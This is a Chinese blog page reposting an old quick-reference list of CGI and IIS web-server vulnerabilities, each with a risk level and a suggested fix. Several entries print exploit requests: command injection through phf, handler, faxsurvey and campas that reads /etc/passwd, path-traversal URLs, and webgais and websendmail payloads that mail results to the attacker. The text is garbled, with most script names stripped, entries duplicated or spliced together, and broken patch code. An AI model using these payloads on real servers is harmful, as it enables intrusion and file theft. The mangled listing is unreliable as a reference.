最新消息:雨落星辰是一个专注网站SEO优化、网站SEO诊断、搜索引擎研究、网络营销推广、网站策划运营及站长类的自媒体原创博客

cgi

旗下网站admin8浏览0评论

cgi

cgi

win7纯净版系统下载-windows installer清理实用工具

2023年4月3日发(作者:win8 1)

CGI安全漏洞资料速查

日期:2003年10月10日

类型:攻击型

名字:phf

风险等级:中

描述:在NCSA或者Apache(1.1.1版本以内)非商业版本的WebServer中

有一段程序util.c,允许黑客以root身份执行任何一个指令:

/cgi-bin/phf?Qname=root%0Asome%20command%20here

建议:无

解决方法:把ApacheWebserver升级到1.1.1以上,或者将NCSAWebserver

升级到最新版本

类型:攻击型

名字:

风险等级:中

描述:如果您使用NT做为您的WebServer的操作系统,而且存

在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬

盘上所有USR_用户能阅读的文件

建议:将从你的Web目录移走或删除

解决方法:将从你的Web目录移走或删除

类型:攻击型

名字:

风险等级:中

描述:如果您使用NT做为您的WebServer的操作系统,而且存

在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬

盘上所有USR_用户能阅读的文件

建议:将从你的Web目录移走或删除

解决方法:将从你的Web目录移走或删除

类型:攻击型

名字:

风险等级:低

描述:在cgi-bin执行目录下存在,这属于严重的配置错误。黑客

可以在后面加一串指令,利用浏览器在server上执行任何

脚本程序

建议:是放在任何带执行权限的web目录下都是不安全的

解决方法:在web目录下移除这个程序.

类型:攻击型

名字:

风险等级:低

描述:如果您使用FrontPage作为您的WebServer,那么入侵者能够利用

IUSR_用户和入侵您的机器,做您不希望的事

建议:将从你的Web目录移走或删除

解决方法:将从你的Web目录移走或删除

类型:攻击型

名字:

风险等级:低

描述:程序容易引起攻击者对服务器进行D.O.S攻击

建议:如无必要可以删除该文件

解决方法:对get_variables的子程序中的下面这段:

if($FORM{'followup'}){$followup="1";

@followup_num=split(/,/,$FORM{'followup'});

$num_followups=@followups=@followup_num;

$last_message=pop(@followups);

$origdate="$FORM{'origdate'}";

$origname="$FORM{'origname'}";

$origsubject="$FORM{'origsubject'}";}

替换为:

if($FORM{'followup'}){

$followup="1";

@followup_num=split(/,/,$FORM{'followup'});

$num_followups=@followups=@followup_num;

$last_message=pop(@followups);

$origdate="$FORM{'origdate'}";

$origname="$FORM{'origname'}";

$origsubject="$FORM{'origsubject'}";

#WWWBoardBombPatch

#WrittenBy:SamuelSparlingsparling@)

$fn=0;

while($fn<$num_followups)

{

$cur_fup=@followups$fn];

$dfn=0;

foreach$fm(@followups)

{

if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)

{

&error(board_bomb);

}

$dfn++;

}

$fn++;

}

#EndWWWBoardBombPatch

}

类型:攻击型

名字:

风险等级:中

描述:如果您使用NT作为您的WebServer的操作系统,入侵者能够利用

上传任何文件

建议:将从你的Web目录移走或删除

解决方法:将从你的Web目录移走或删除

类型:攻击型

名字:

风险等级:高

描述:如果您使用NT做为您的WebServer的操作系统,而且存在

于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上

无止境的创建ODBC数据库,并生成一些可执行的文件。

建议:将从你的Web目录移走或删除

解决方法:将从你的Web目录移走或删除

类型:攻击型

名字:

风险等级:高

描述:在/cgi-bin目录下的程序(wwwcount2.3版本)有一个溢出

错误,允许入侵者无须登录而远程执行任何指令。

建议:如无必要可以删除该文件

解决方法:将wwwcount升级到2.4或者以上

类型:攻击型

名字:test-cgi

风险等级:高

描述:test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限

解决方法:删除test-cgi文件

类型:攻击型

名字:nph-test-cgi

风险等级:高

描述:nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限

解决方法:删除nph-test-cgi文件

类型:攻击型

名字:

风险等级:低

描述:程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系

统文件可以被入侵者读取的漏洞

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除程序是最好的办法

类型:攻击型

名字:handler

风险等级:低

描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出

错误,允许入侵者在server上远程执行一段程序:

80

GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download

HTTP/1.0

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除handler文件

类型:攻击型

名字:webgais

风险等级:高

描述:/cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个

毛病使入侵者可以绕过程序的安全机制,执行系统命令:

POST/cgi-bin/webgaisHTTP/1.0

Content-length:85(replacethiswiththeactuallengthof

the"exploit"line)

80query=';mail+you@

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除webgais文件

类型:攻击型

名字:websendmail

风险等级:高

描述:/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:

80

POST/cgi-bin/websendmailHTTP/1.0

Content-length:xxx(shouldbereplacedwiththeactual

lengthofthestringpassedtotheserver,inthiscase

xxx=90)receiver=;mail+your_address@

&content=a

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:高级用户:编辑websendmail脚本,过滤特殊字符

一般用户:删除websendmail文件

类型:攻击型

名字:

风险等级:高

描述:对于Irix6.2和6.3平台,/cgi-bin目录下的有一个弱点

允许入侵者无须登录而在系统上执行任何指令:

http://host/cgi-bin/?distloc=;cat%20/etc/passwd

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/var/www/cgi-bin/目录下的

类型:攻击型

名字:faxsurvey

风险等级:高

描述:在LinuxS.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无

须登录就能在服务器执行指令:/

cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin/faxsurvey文件

类型:攻击型

名字:htmlscript

风险等级:中

描述:安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使

入侵者可以查看服务器上的任何文件:

/cgi-bin/htmlscript?../../

../../etc/passwd

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到

3.0以上

类型:攻击型

名字:pfdisplay

风险等级:中

描述:在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序

允许入侵者非法查看服务器上的文件

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin/pfdisplay文件,或者打补丁,补丁可以去

(204.94.209.1)或者下载:

Filename:.3018

Algorithm#1(sum-r):.3018

Algorithm#2(sum):.3018

MD5checksum:1169EB51D75E0794C64C2C1FD6211B69

Filename:patchSG0003018

Algorithm#1(sum-r):016792patchSG0003018

Algorithm#2(sum):128762patchSG0003018

MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8

Filename:

Algorithm#1(sum-r):

Algorithm#2(sum):

MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename:mer_tools_man

Algorithm#1(sum-r):-

-former_tools_man

Algorithm#2(sum):mer_t-

-ools_man

MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename:mer_tools_sw

Algorithm#1(sum-r):m-

-er_tools_sw

Algorithm#2(sum):mer_

tools_sw

MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F

类型:攻击型

名字:www-sql

风险等级:中

描述:www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保

护的文件

建议:最好删除www-sql文件

解决方法:#ifPHPFASTCGI

while(FCGI_Accept()>=0)

{

#endif

s=getenv("REDIRECT_STATUS");

if(!s){

puts("Content-type:text/plainrnrnPHP/FIdetected

informsa@hat

youjustdid.n");

exit(1);

}

s=getenv("PATH_TRANSLATED");

类型:攻击型

名字:view-source

风险等级:高

描述:在cgi-bin目录下的view-source程序没有对输入进行安全检查,使

入侵者可以查看服务器上的任何文件

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin目录下的viewsource程序

类型:攻击型

名字:campas

风险等级:高

描述:在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看

server上的重要文件:

80

...

Escapecharacteris'^]'.

GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin目录下的campas程序

类型:攻击型

名字:aglimpse

风险等级:高

描述:在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登

录而随意执行任何指令

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin目录下的aglimpse程序

类型:攻击型

名字:

风险等级:中

描述:在ExciteforWebServers1.1上的/cgi-bin/程序,允

许普通用户完全控制整个系统

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin目录下的程序

类型:攻击型

名字:finger

风险等级:中

描述:这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,

但是如果将参数改成本机,本机上的帐号信息将暴露无遗:

/cgi-bin/finger?@localhost

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin目录下的finger程序

类型:攻击型

名字:

风险等级:中

描述:如果在您的Web可执行目录中有这个CGI脚本,那么入侵

者将能利用他阅读启动Web的用户能读写执行的任何文件。

建议:将从您的Web目录中删除或移走

解决方法:将从您的Web目录中删除或移走

类型:攻击型

名字:w3-msql

风险等级:低

描述:MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以

httpd的uid权限执行任意代码。这个安全漏洞是由程序中的

scanf()函数引起的。

建议:如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql

文件删除或移走

解决方法:如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql

文件删除或移走,或使用以下补丁。

补丁:

---------------

410c410

scanf("%s",boundary);---

418c418

428c428

---------------

类型:攻击型

名字:NetscapeFastTrackserver2.0.1a

风险等级:中

描述:UnixWare7.1附带的NetscapeFastTrackserver2.0.1a存在一个远程

缓冲区溢出漏洞。缺省地,监听457端口的httpd通过http协议提供

UnixWare文档。如果向该服务器传送一个长度超过367字符的GET请

求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以httpd权

限执行。

建议:临时解决方法是关闭NetscapeFastTrack服务器

解决方法:临时解决方法是关闭NetscapeFastTrack服务器。

类型:攻击型

名字:

风险等级:高

描述:位于cgi-bin目录下的程序,是用于简单表单通过邮件

传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,

在server上执行任何指令.

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:建议升级该cgi程序,或者删除该文件

类型:攻击型

名字:

风险等级:低

描述:在多个WebServer中带有的存在溢出漏洞。它们包括:

WhoisInternicLookup-version:1.02

CCWhois-Version:1.0

Matt'sWhois-Version:1

他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任

意的代码

建议:将在您Web目录中问删除或移走

解决方法:将在您Web目录中问删除或移走

类型:攻击型

名字:

风险等级:中

描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/

程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些

文件。

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:建议升级该cgi程序,或者删除该文件

类型:攻击型

名字:wrap

风险等级:中

描述:/cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件

的非法访问,如:

http://host/cgi-bin/wrap?/../../../../../etc

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin/wrap文件

类型:攻击型

名字:

风险等级:中

描述:/cgi-bin/有一个安全弱点,用下面这条命令就可以访问用

户的配置情况:

/cgi-bin/?account=&password=

建议:建议审核cgi-bin目录,避免有不必要的程序存在

解决方法:删除/cgi-bin/文件

类型:攻击型

名字:

风险等级:中

描述:UNix系统的/_vti_pvt/可读,

将暴露用户密码信息

建议:建议删除

解决方法:

类型:攻击型

名字:

风险等级:中

描述:UNix系统的/_vti_pvt/

可读,将暴露用户密码信息

建议:建议删除

解决方法:

相关连接:

类型:攻击型

名字:

风险等级:中

描述:UNix系统的/_vti_pvt/可读,

将暴露用户密码信息

建议:建议删除

解决方法:

类型:攻击型

名字:

风险等级:中

描述:UNix系统的/_vti_pvt/可读,

将暴露用户密码信息

建议:建议删除

解决方法:

类型:攻击型

名字:

风险等级:中

描述:在OmniHTTPdWebServer的cgi-bin目录下存在这个文件,

那么攻击者只要输入下面的命令:

/cgi-bin/?user=guest数分钟之

后服务器的硬盘将会被撑满

建议:建议删除

解决方法:把从cgi-bin目录中删除

类型:攻击型

名字:

风险等级:高

描述:Alibaba的webserver,其cgi-bin目录存在这个程序,允

许入侵者任意执行一条指令:

/cgi-bin/|echo%20>c:

建议:建议删除

解决方法:把从cgi-bin目录中删除

类型:攻击型

名字:

风险等级:高

描述:Alibaba的webserver,其cgi-bin目录存在这个程序,允

许入侵者任意执行一条指令:

/cgi-bin/|dir

建议:建议删除

解决方法:把从cgi-bin目录中删除

类型:攻击型

名字:

风险等级:高

描述:Alibaba的webserver,其cgi-bin目录存在这个程序,允许

入侵者任意执行一条指令:

/cgi-bin/|type%20c:

建议:建议删除

解决方法:把从cgi-bin目录中删除

类型:攻击型

名字:

风险等级:低

描述:如果您使用NT作为您的WebServer的操作平台,并只安装了SP3补丁,

那么入侵者能利用这个CGI程序进行DoS攻击,使您的IIS服务拒绝

访问。

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:攻击型

名字:

风险等级:低

描述:如果在您的Web目录中含有

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/exampleapp/email/

/cfdocs/exampleapp/publish/admin/

这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:攻击型

名字:

风险等级:低

描述:如果在您的Web目录中含有

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/exampleapp/email/

/cfdocs/exampleapp/publish/admin/

这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

相关连接:/handlers/?ID=8727&Method=Full

类型:攻击型

名字:

风险等级:低

描述:如果在您的Web目录中含有

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/exampleapp/email/

/cfdocs/exampleapp/publish/admin/

这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:攻击型

名字:

风险等级:中

描述:将在您Web目录中的删除或移走

在多个WebServer中带有的存在溢出漏洞。它们包括:

WhoisInternicLookup-version:1.02

CCWhois-Version:1.0

Matt'sWhois-Version:1

他们将使入侵者

能够在您的系统上使用启动httpd用户的权限执行任意的代码

如果在您的Web目录中含有

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/expeval/

/cfdocs/exampleapp/email/

/cfdocs/exampleapp/publish/admin/

这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:攻击型

名字:

风险等级:中

描述:如果您使用NT+IIS作为您的WebServer的情况下,入侵者能够利用

这个ASP查看您系统上所有启动httpd用户有权限阅读的文件请前往

以下地址查询补丁InternetInformationServer:

ftp:///bussys/iis/iis-public/fixes/usa/

Viewcode-fix/

SiteServer:

ftp:///bussys/sitesrv/sitesrv-public/fixes/

usa/siteserver3/hotfixes-postsp2/Viewcode-fix/

/security/products/iis/

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:信息型

名字:_1

风险等级:中

描述:在/iissamples/exair/howitworks/下面存在文件,

用下面的路径:

/iissamples/exair/howitworks/?

source=/就可以查看到的源码。实际上任何

ascii文件都可以浏览。

建议:删除名叫/iissamples/的web目录

解决方法:将在您Web目录中的删除或移走

请前往以下地址查询补丁

InternetInformationServer:

ftp:///bussys/i...s/usa/Viewcode-fix/

SiteServer:

ftp:///bussys/sitesrv/sitesrv-public/fixes/usa/

siteserver3/hotfixes-postsp2/Viewcode-fix/

/security/products/iis/

相关连接:ftp:///bussys/iis/iis-public/fixes/

usa/Viewcode-fix/

类型:攻击型

名字:_1

风险等级:中

描述:在/msads/Samples/SELECTOR/目录下存在文件,用下

面的路径:

/msadc/Samples/SELECTOR/?source=/

msadc/Samples/../../../../../

可以查到文件的内容;实际上入侵者能够利用这个ASP查看您

系统上所有启动httpd用户有权限阅读的文件

建议:禁止对/msads目录的匿名访问

解决方法:将在您Web目录中的删除或移走

请前往以下地址查询补丁

InternetInformationServer:

ftp:///bussys/iis/iis-public/fixes/usa/

Viewcode-fix/

SiteServer:

ftp:///bussys/sitesrv/sitesrv-public/fixes/usa/

siteserver3/hotfixes-postsp2/Viewcode-fix/

/security/products/iis/

相关连接:ftp:///bussys/iis/iis-public/fixes/

usa/Viewcode-fix/

类型:攻击型

名字:/msadc目录可以访问

风险等级:中

描述:WindowsNTIISserver下的/msadc目录可以访问,会造成一系列安全

问题,包括被入侵者非法调用应用程序

建议:建议删除不必要的由IIS缺省安装形成的目录

解决方法:禁止/msadc目录,如果必须打开该目录,至少应该设置成合法

用户需要密码才能访问

类型:攻击型

名字:

风险等级:中

描述:这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取

的文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走,或前往以下地址

下载Patch

/products/server/310/

patches/

类型:攻击型

名字:

风险等级:低

描述:如果您安装了SystemsrunningiCatSuiteversion3.0,那么它将自

动在你的系统上添加一个叫的文件,而入侵者将能利用

这个文件访问您系统上的热和文件

建议:将在您Web目录中的删除或移走

解决方法:将在您Web目录中的删除或移走

类型:攻击型

名字:whois_

风险等级:低

描述:因为whois_作者的失误,这个CGI将使入侵者能够以您系统

上启动httpd的用户的权限执行您系统上任意的程序

建议:将在您Web目录中的whois_删除或移走

解决方法:将在您Web目录中的whois_删除或移走

类型:攻击型

名字:doc

风险等级:低

描述:您的Web目录可以文件列表,这将帮助入侵者分析您的系统信息

建议:将您的所有Web目录设置为不能文件列表

解决方法:将您的所有Web目录设置为不能文件列表

类型:攻击型

名字:.html/............./

风险等级:低

描述:如果您使用的是较久版本的ICQ,那么入侵者能够利用它阅读您机

器上的所有文件

建议:下载新版本的ICQ

解决方法:请前往以下地址下载新版本的ICQ

类型:攻击型

名字:....../

风险等级:中

描述:您使用的WebServer软件能使入侵者阅读您系统上的所有文件

建议:更换或升级您的WebServer软件

解决方法:更换或升级您的WebServer软件

类型:攻击型

名字:

风险等级:低

描述:由于您的WebServer软件的缺陷,使得入侵者能够利用不存在的CGI

脚本请求来分析您的站点的目录结构

建议:升级您的WebServer软件

解决方法:升级您的WebServer软件

类型:攻击型

名字:_vti_bin/

风险等级:低

描述:入侵者利用这个文件将能使您的系统的CPU占用率达到100%

建议:将_vti_bin/从您的Web目录删除或移走

解决方法:将_vti_bin/从您的Web目录删除或移走

类型:信息型

名字:nph-publish

风险等级:中

描述:在/cgi-bin目录下存在nph-publish文件,这使入侵者能通过www浏

览服务器上的任何文件

建议:建议审查/cgi-bin目录,删除不必要的cgi程序

解决方法:删除nph-publish文件

类型:信息型

名字:

风险等级:中

描述:在/msadc/Samples/SELECTOR/?source=/msadc/Sampl

es/SELECTOR/目录下存在文件可以被入侵者利用来查

看服务器上的文件内容

建议:最好禁止/msadc这个web目录的匿名访问,建议删除这个web目录

解决方法:删除文件

类型:信息型

名字:_vti_

风险等级:中

描述:web根目录下存在_vti_文件,该文件是Frontpageexten-

-tionserver的特征,包含了一系列FrontpageExtentionServer的重

要信息;而且FrontpageExtentionserver是一个有很多漏洞的web

服务,用它入侵者可能直接修改首页文件。

建议:用ftp等其它方式上载网页文件

解决方法:卸载FrontpageExtentionServer

类型:信息型

名字:::$DATA

风险等级:中

描述:asp程序的源代码可以被后缀+::$DATA的方法查看到,这样入侵者可

以设法查到服务器数据库密码等重要信息

建议:建议留意微软最新关于codeview的补丁和安全公告

解决方法:安装servicespack6或者打补丁:

ftp:///bussys/iis/iis-public/fixes/chs/security/

fesrc-fix/

相关连接:ftp:///bussys/iis/iis-public/fixes/

chs/security/fesrc-fix/

类型:攻击型

名字:%81

风险等级:低

描述:asp程序的源代码可以被后缀+%81的方法查看到,这样入侵者可以设

法查到服务器数据库密码等重要信息

建议:建议留意微软最新关于codeview的补丁和安全公告

解决方法:安装servicespack6或者打补丁:

ftp:///bussys/iis/iis-public/fixes/chs/security

/fesrc-fix/

相关连接:ftp:///bussys/iis/iis-public/fixes/

chs/security/fesrc-fix/

类型:信息型

名字:_2

风险等级:中

描述:在/msadc/Samples/SELECTOR/目录下存在文件,用下

面的路径:/msadc/Samples/SELECTOR/showcode.

asp?source=/msadc/Samples/../../../../../可以查到

文件的内容;实际上入侵者能够利用这个ASP查看您系统上

所有启动httpd用户有权限阅读的文件

建议:禁止对/msadc目录的匿名访问

解决方法:将在您Web目录中的删除或移走

请前往以下地址查询补丁

InternetInformationServer:ftp:///bussys/iis/iis

-public/fixes/usa/Viewcode-fix/

SiteServer:

ftp:///bussys/sitesrv/sitesrv-public/fixes/usa/

siteserver3/hotfixes-postsp2/Viewcode-fix/

/security/products/iis/

相关连接:ftp:///bussys/iis/iis-public/fixes/

usa/Viewcode-fix/

类型:攻击型

名字:

风险等级:高

描述:在/scripts/iisadmin/目录下存在文件,这个文件有一个溢

出错误,允许入侵者在服务器上执行任意一段程序;另外。攻击者

还随时可以令服务器的www服务死掉

建议:禁止对/scripts目录的匿名访问

解决方法:删除/scripts/iisadmin/,或者打开iis的管理控制台,

选取默认web站点,点右键,选取属性,点:"主目录",在起始

点那行点"配置"按钮,将".htr"的应用程序映射项删除

类型:信息型

名字:_2

风险等级:中

描述:在/iissamples/sdk/asp/docs/下面存在文件,用下面

的路径:/iissamples/exair/howitworks/code

?source=/就可以查看到的源码。实

际上任何ascii文件都可以浏览。

建议:删除名叫/iissamples/的web目录

解决方法:将在您Web目录中的删除或移走

请前往以下地址查询补丁

InternetInformationServer:

ftp:///bussys/i...s/usa/Viewcode-fix/

SiteServer:

ftp:///bussys/sitesrv/sitesrv-public/fixes/usa/

siteserver3/hotfixes-postsp2/Viewcode-fix/

/security/products/iis/

相关连接:ftp:///bussys/iis/iis-public/fixes/

usa/Viewcode-fix/

类型:攻击型

名字:

风险等级:高

描述:在/scripts/tools目录下存在程序,只要入侵者有一个

可用帐号,哪怕是Guest帐号,就可以上传任何文件到你的web目录,

除了替换主页外,他更可以进一步控制你的整个系统!

建议:删除名为/scripts的web目录

解决方法:删除文件

相关连接:

类型:攻击型

名字:

风险等级:高

描述:在/scripts/tools目录下存在程序,只要入侵者有一个

可用帐号,哪怕是Guest帐号,就可以上传任何文件到你的web目录,

除了替换主页外,他更可以进一步控制你的整个系统!

建议:删除名为/scripts的web目录

解决方法:删除文件

相关连接:

类型:攻击型

名字:

风险等级:低

描述:在/IISSAMPLES/ExAir/Search/的目录下存在文件,这个

文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,

机器速度将明显变慢

建议:禁止对/iissamples目录的存取

解决方法:删除文件

71

类型:攻击型

名字:

风险等级:低

描述:在/IISSAMPLES/ExAir/Search/的目录下存在文件,这个

文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,

机器速度将明显变慢

建议:禁止对/iissamples目录的存取

解决方法:删除文件

类型:攻击型

名字:

风险等级:低

描述:在/IISSAMPLES/ExAir/Search/的目录下存在文件,这个

文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,

机器速度将明显变慢

建议:禁止对/iissamples目录的存取

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:这个存在于/scripts/tools目录下的文件允许任何一

个用户在web根目录下创建任何文件,和创建ODBC数据源

建议:禁止对/scripts/tools目录的匿名访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:这个存在于/scripts/tools目录下的文件允许任何一个

用户在web根目录下创建任何文件,如:

/scripts/tools/?driver=Microsoft

%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft

&dbq=..%2F..%2Fwwwroot%&newdb=CREATE_DB&attr=

建议:禁止对/scripts/tools目录的匿名访问

解决方法:删除文件

类型:信息型

名字:_3

风险等级:中

描述:在/iissamples/exair/howitworks/存在文件,入侵者利用

该文件可以查看服务器硬盘上任何一个ASCII文件的内容,并显示asp

程序文件的源代码

建议:禁止对/iissamples的web目录的匿名访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在/iisadmpwd目录下存在文件,类似的还有,

和等,这些文件允许攻击者用穷举法等方式破

解和修改NT用户的密码。

建议:建议禁止对/iisadmpwd目录的访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在/iisadmpwd目录下存在文件,类似的还有,

和等,这些文件允许攻击者用穷举法等方式破

解和修改NT用户的密码。

建议:建议禁止对/iisadmpwd目录的访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在/iisadmpwd目录下存在文件,类似的还有,

和等,这些文件允许攻击者用穷举法等方式破

解和修改NT用户的密码。

建议:建议禁止对/iisadmpwd目录的访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在/iisadmpwd目录下存在文件,类似的还有,

和等,这些文件允许攻击者用穷举法等方式破

解和修改NT用户的密码。

建议:建议禁止对/iisadmpwd目录的访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在/iisadmpwd目录下存在文件,类似的还有,

和等,这些文件允许攻击者用穷举法等方式破

解和修改NT用户的密码。

建议:建议禁止对/iisadmpwd目录的访问

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在Coldfusion的web目录:/cfdocs/expeval/文件,这

个文件有个漏洞允许用户读取服务器硬盘上的任意文件包括用户密

码数据库sam文件

建议:删除相关的文件

解决方法:删除文件

类型:攻击型

名字:

风险等级:中

描述:在Coldfusion的web目录:/文件,这个文件有个漏洞允

许用户读取服务器硬盘上的任意文件包括用户密码数据库sam文件

建议:删除相关的文件

解决方法:删除文件

类型:信息型

名字:

风险等级:中

描述:IIS4.0上有一个应用程序映射htw--->,这是用于Inde

xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有

效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文

件,数据库文件,和ASP源代码。

建议在IIS控制台中删除无用的应用程序映射

类型:信息型

名字:

风险等级:中

描述:IIS4.0上有一个应用程序映射htw--->,这是用于Inde

xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有

效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文

件,数据库文件,和ASP源代码。

建议:建议在IIS控制台中删除无用的应用程序映射

类型:信息型

名字:

风险等级:中

描述:IIS4.0上有一个应用程序映射htw--->,这是用于Inde

xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有

效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文

件,数据库文件,和ASP源代码。

建议:建议在IIS控制台中删除无用的应用程序映射

cgi

发布评论

评论列表(0)

  1. 暂无评论